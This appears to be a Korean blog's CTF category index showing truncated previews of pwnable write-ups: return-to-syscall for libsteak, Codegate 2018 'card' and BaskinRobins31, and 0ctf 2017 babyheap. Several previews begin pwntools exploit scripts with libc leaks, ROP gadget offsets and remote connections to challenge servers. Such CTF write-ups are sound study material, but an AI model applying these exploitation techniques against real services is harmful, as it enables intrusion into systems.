CTF (24) 썸네일형 리스트형 pwnable.kr dos4fun exploit code 보호되어 있는 글입니다. pwnable.kr aeg exploit code 보호되어 있는 글입니다. pwnable.kr elf exploit code 보호되어 있는 글입니다. pwnable.kr lokihardt exploit code 보호되어 있는 글입니다. [문서] Return to syscall + H3X0R CTF libsteak write up Return to syscall H3X0R ctf libsteak write up 314ckC47 H3X0R Summary 이번에 H3X0R CTF에서 출제한 문제중 libsteak 문제의 intended solution인 "자칭" return to syscall이란 기법에 대해 작성 해 보겠습니다. 이 기법의 아이디어 캐치는 "코드게이트 예선 문제"였구요 이 아이디어를 이용해 libsteak를 풀 수 가 있습니다. Syscall Wrapping Functions 핵심적으로 알아야 할 것은, glibc(libc.so.6)에서는 system call을 wrapping 하는 함수가 '꽤나' 있단 겁니다. 당장 우리가 자주 쓰는 read 함수나, write 함수만 봐도, // path : /glibc-2.27.. Codegate 2018 'card' exploit code #!/usr/bin/python from pwn import * from struct import * p = process("./card") p = remote("110.10.147.17",8888) e = ELF("./card") l = ELF("/lib/i386-linux-gnu/libc.so.6") l = ELF("/lib32/libc.so.6") raw_input(">>>") pppr = 0x1439 leaveret = 0xd3c pebpret = 0x143b addr = 0 def leak(snum): addr = 0 for i in [1,0x100,0x10000,0x1000000]: p.readuntil("x, y : ") p.sendline("{},0".format(snum)) p.readu.. Codegate 2018 Write up : melong, BaskinRobins31, RedVelvet, ImpelDown BaskinRobins31 Category : pwn 그냥 simple ROP 문제이다. 굳이 게임을 이길 필요는 없고 사용자 턴일때 ROP를 할 수 있다. 단 libc 파일이 주어지지 않아 *운*이 좋게인진 모르겠는데 최신 버전은 다 그런지도 모르겠지만은 본인 버전 libc로는 오프셋 계산 공격이 되지 않길래 libc의 read함수 text영역에서 \x0f\x05(syscall)이 나올때까지 긁은 후 시스템 콜 인자를 구성 해 공격 했다.#!/usr/bin/python from pwn import * e = ELF("./BaskinRobins31") context.clear(arch='amd64') #p = process("./BaskinRobins31"); p = remote("ch41l3ng3s.c.. 0ctf 2017 babyheap 요즘 다시 대회 문제에 손을 하나씩 대고 있는데...힙이 아직 넘사벽이여서힙을 공부중입니다껄껄 그냥 fastbin duplicate + unsorted bin에 관해 알면 익스가 가능 합니다. 대충 봤는데 heap base를 릭 해서 뚜샤뚜샤 하루도 있을거 같고mprotect를 heap 세그먼트에 써서 쉘코드 뚜샤뚜샤도 될거 같다 히히 친-절하게 주석까지 다 달아 놓음 #!/usr/bin/pythonfrom pwn import * p = process("./babyheap")#p = remote("localhost",4000)lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")elf = ELF("./babyheap") def alloca(size):p.sendline("1")p.. 이전 1 2 3 다음
